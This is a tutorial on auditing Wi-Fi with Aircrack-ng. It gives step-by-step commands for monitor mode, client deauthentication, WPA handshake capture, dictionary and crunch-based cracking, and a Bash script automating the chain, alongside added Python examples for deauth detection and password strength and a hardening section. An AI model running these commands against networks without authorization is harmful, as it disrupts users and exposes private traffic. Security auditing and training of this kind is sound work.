Aircrack-ng: Complete guide for auditing Wi‑Fi networks on Linux

Introduction

Today, wireless network security is a critical aspect for both home users and IT professionals. The proliferation of IoT devices, remote work, and growing reliance on connectivity have increased the attack surface of Wi‑Fi networks. In this context, Aircrack-ng has become one of the most powerful and versatile tools for conducting security audits in Linux environments. This article provides a comprehensive guide, from basic concepts to advanced usage techniques, so you can assess and strengthen the protection of your own networks responsibly.

What is Aircrack-ng?

Aircrack-ng is a set of command‑line utilities designed to detect, capture, analyze, and attempt to crack the keys of Wi‑Fi networks protected with WEP, WPA, WPA2 and, experimentally, WPA3. The package includes specialized tools such as airmon-ng (puts the interface in monitor mode), airodump-ng (captures packets), aireplay-ng (injects traffic and provokes deauthentications), and aircrack-ng (the cracking engine). Thanks to its modular architecture, each phase of the audit process can be run independently or chained via scripts, making it ideal for both manual testing and automated environments.

Main Features

  • Broad support for various encryption types: WEP, WPA, WPA2, and WPA3 (experimental).
  • Available in the official repositories of most Linux distributions (Ubuntu, Debian, Fedora, Arch, openSUSE, etc.).
  • Lightweight command‑line interface suitable for servers, embedded systems, and headless environments.
  • Large active community, extensive documentation, and numerous tutorials, scripts, and help forums.
  • Compatibility with a wide range of Wi‑Fi adapters that support monitor mode and packet injection (Atheros, Realtek, certain Intel and Ralink chips).
  • Ability to integrate with other tools such as hashcat, crunch, or pyrit for more effective attacks using GPU or rainbow tables.

Installation on Popular Linux Distributions

Before installing, verify that your adapter supports monitor mode and injection. You can consult the compatibility list on the official Aircrack-ng wiki or run airmon-ng to see if the interface appears.

Ubuntu / Debian

  • Update package index: sudo apt update
  • Install the main package: sudo apt install aircrack-ng
  • Optional but recommended for compiling from source or using specific drivers: sudo apt install linux-headers-$(uname -r) build-essential libssl-dev

Fedora

  • Install from the official repository: sudo dnf install aircrack-ng
  • For development and compilation tools: sudo dnf install kernel-devel gcc make

Arch Linux

  • Use the community repository: sudo pacman -S aircrack-ng
  • If you prefer to compile the latest version: git clone https://github.com/aircrack-ng/aircrack-ng.git, then cd aircrack-ng && make && sudo make install.

Preparing the Interface

The first step is to put the Wi‑Fi card into monitor mode. Assuming your interface is called wlan0:

  • Stop any service that could interfere with capture: sudo airmon-ng check kill
  • Enable monitor mode: sudo airmon-ng start wlan0
  • This creates a new interface, usually wlan0mon, ready to capture traffic.
  • Check the status with iwconfig; you should see “Mode:Monitor” on the created interface.

Packet Capture with airodump-ng

To identify nearby networks and obtain the necessary handshakes, run:

  • sudo airodump-ng wlan0mon

This command displays a real‑time table with BSSID, ESSID, channel, signal strength, and associated clients. Note the BSSID and channel of the target network, for example AA:BB:CC:DD:EE:FF on channel 6.

Then focus the capture on that network and save the data to a file:

  • sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

The -w parameter defines the prefix for output files (captura-01.cap, captura-01.csv, etc.). While the capture is active, you need to provoke a handshake.

Obtaining the Handshake (WPA/WPA2)

To force a client’s reauthentication and capture the four‑way handshake, use aireplay-ng:

  • sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

The argument -0 2 sends two deauthentication packets; -a specifies the AP’s BSSID and -c the target client’s MAC address. When the client reconnects, the handshake will be recorded in the capture file.

If you don’t know a client’s MAC, you can omit the -c option; aireplay-ng will then send deauthentications to all associated clients, increasing the chance of capturing a handshake.
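Seen from the defender's side, the deauthentication frames described above stand out in a monitor-mode capture. The following added example (not part of the original guide) parses radiotap-encapsulated 802.11 frames and flags bursts per BSSID; the window, the threshold and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(pkt):
    """Return (dst, src, bssid, reason) for a radiotap + 802.11 deauth frame, else None."""
    if len(pkt) < 4:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]  # radiotap header length (little-endian)
    dot11 = pkt[rt_len:]
    if len(dot11) < 26 or dot11[0] != DEAUTH_FC0:  # 24-byte header + 2-byte reason code
        return None
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def detect_bursts(packets, window=10.0, threshold=5):
    """Alert once per BSSID when `threshold` deauth frames arrive within `window` seconds."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, pkt in packets:
        parsed = parse_deauth(pkt)
        if parsed is None:
            continue
        dst, _src, bssid, reason = parsed
        seen = recent[bssid]
        seen.append(ts)
        while ts - seen[0] > window:  # drop frames that fell out of the window
            seen.popleft()
        if len(seen) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "since": seen[0], "count": len(seen),
                           "broadcast": dst == BROADCAST, "reason": reason})
    return alerts

# Constructed sample frames (not a real capture): minimal radiotap header + 802.11 header.
def sample(fc0, dst, reason="0700"):
    ap = "aabbccddeeff"
    return bytes.fromhex("0000080000000000" + fc0 + "000000" + dst + ap + ap + "0000" + reason)

SAMPLE = [(0.0, sample("80", "ffffffffffff"))]                               # beacon, ignored
SAMPLE += [(1.0 + i * 0.1, sample("c0", "ffffffffffff")) for i in range(6)]  # burst to broadcast
SAMPLE += [(100.0, sample("c0", "112233445566", "0300"))]                    # single frame, no alert

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE):
        print(alert)
```

Networks that enable Protected Management Frames (802.11w, mandatory in WPA3) let clients discard unauthenticated deauthentication frames, so on such networks this alert indicates an attempt rather than a successful disconnection.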

Cracking the Key with aircrack-ng

With the capture file containing the handshake, you can attempt to crack the key using a dictionary:

  • sudo aircrack-ng -w /ruta/al/diccionario.txt captura-01.cap

Aircrack-ng will test each password in the dictionary against the handshake. If the key is present, it will show something like:

  • KEY FOUND! [ miClaveSecreta ]

For pure brute‑force attacks (not recommended due to time required), you can combine Aircrack-ng with tools like crunch or hashcat. For example, generate a dictionary of every 8 to 10 character combination of lowercase letters and digits with crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt and then pass it to Aircrack-ng.

You can also explicitly specify the attack type and the target network:

  • -a 1 for WEP.
  • -a 2 for WPA/WPA2.
  • -b to select the target network by BSSID when the capture contains several networks.

Automation with Scripts

For repetitive tests or audits of multiple networks, it is useful to create scripts that chain the phases. A basic Bash example:

#!/bin/bash
# Audit parameters: monitor interface, channel, BSSID of your own AP, output prefix
INTERFAZ=wlan0mon
CANAL=6
BSSID=AA:BB:CC:DD:EE:FF
OUTPUT=ataque

# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture handshake
sudo airodump-ng -c "$CANAL" --bssid "$BSSID" -w "$OUTPUT" "$INTERFAZ" &
CAPTURE_PID=$!
# Wait a bit for capture to start
sleep 5
# Deauthenticate clients
sudo aireplay-ng -0 5 -a "$BSSID" "$INTERFAZ"
# Wait for handshake capture
sleep 15
# The capture runs as root under sudo, so a plain kill from an unprivileged shell is refused
sudo kill "$CAPTURE_PID"
# Attempt cracking
sudo aircrack-ng -w /ruta/al/diccionario.txt "${OUTPUT}-01.cap"

This script activates the interface, starts capture, sends deauthentication packets, and after an interval attempts to crack the key. You can expand it with logging, email notifications, or integration with vulnerability management tools.

Troubleshooting Common Issues

  • Interface does not enter monitor mode: Verify that the driver supports this functionality and that there are no conflicts with NetworkManager or wpa_supplicant. Use sudo airmon-ng check kill to stop them.
  • No networks appear in airodump-ng: Ensure the card is actually in monitor mode (iwconfig) and that you are within range; some adapters have limited sensitivity.
  • Handshake not captured: This may be due to lack of active clients or an AP that ignores deauthentications. Try moving closer to the router, using a higher‑gain antenna, or waiting for a device to connect naturally.
  • Aircrack-ng does not find the key despite having the handshake: Verify that the dictionary contains the exact password; try transformation rules (-r in hashcat) or combine multiple lists.
  • Permission errors: Most operations require root privileges; run commands with sudo or switch to a root session.

Ethical and Legal Considerations

It is essential to remember that using Aircrack-ng on networks without explicit authorization is illegal and violates computer security laws in most countries. This guide is intended exclusively for:

  • Security audits on your own networks or on those where you have written permission from the owner.
  • Controlled lab environments for learning and certification (e.g., OSCP, CEH, GWAPT).
  • Increasing awareness of Wi‑Fi configuration vulnerabilities and applying appropriate countermeasures.

Always work within the legal framework and respect others’ privacy.

Best Practices to Protect Your Wi‑Fi Network

After conducting your tests, apply the following recommendations to strengthen security:

  • Use WPA3 encryption when available; otherwise, use WPA2‑AES with a long, random password (minimum 20 characters).
  • Disable WPS, as it can be exploited to obtain the PIN and derive the key.
  • Regularly update router firmware to patch known vulnerabilities.
  • Segment the guest network and limit access to critical resources via VLAN or separate SSIDs.
  • Monitor traffic with tools such as Wireshark or tcpdump to detect anomalous behavior.
  • Implement MAC address filtering as an additional layer (though not foolproof) and periodically review the list of connected devices.
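
The recommendation of a long, random password can be quantified. This added example (not from the original guide) derives the WPA2 PMK with the standard PBKDF2 construction and compares the search space of the crunch command shown earlier with a 20‑character random passphrase; RATE is an assumed guess rate, not a benchmark.

```python
import hashlib
import math

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32 bytes."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode(), 4096, 32)

def keyspace(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates an exhaustive generator has to cover."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))

def wordlist_bytes(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Size on disk of that list, one newline-terminated candidate per line."""
    return sum((n + 1) * alphabet_size ** n for n in range(min_len, max_len + 1))

def years_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    return candidates / guesses_per_second / (365 * 24 * 3600)

RATE = 1_000_000  # assumption: PMK guesses per second available to an attacker

POLICIES = {
    "crunch 8 10, a-z0-9": keyspace(36, 8, 10),
    "20 random chars, a-zA-Z0-9": keyspace(62, 20, 20),
}

def report():
    """Rows of (policy, bits of search space, years to exhaust at RATE)."""
    return [(name, round(math.log2(size), 1), years_to_exhaust(size, RATE))
            for name, size in POLICIES.items()]

if __name__ == "__main__":
    # The SSID is the salt, so the same passphrase yields a different PMK on each network name.
    print(wpa2_pmk("password", "IEEE").hex())
    print(f"crunch list size: {wordlist_bytes(36, 8, 10) / 1e15:.0f} PB")
    for name, bits, years in report():
        print(f"{name}: {bits} bits, {years:.3g} years at {RATE:,} guesses/s")
```

Because the SSID salts the derivation, precomputed tables only apply to the network name they were built for, so a non-default SSID also helps.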

Conclusion

Aircrack-ng is an essential tool for any security professional working in Linux environments who needs to evaluate the resilience of their wireless networks. Its combination of utilities for monitoring, capture, injection, and cracking provides a complete and flexible workflow. However, its power entails great responsibility: use it only with permission and within legal limits. With the knowledge gained from this post, you will be better prepared to identify weaknesses, apply patches, and keep your Wi‑Fi connections secure against external threats.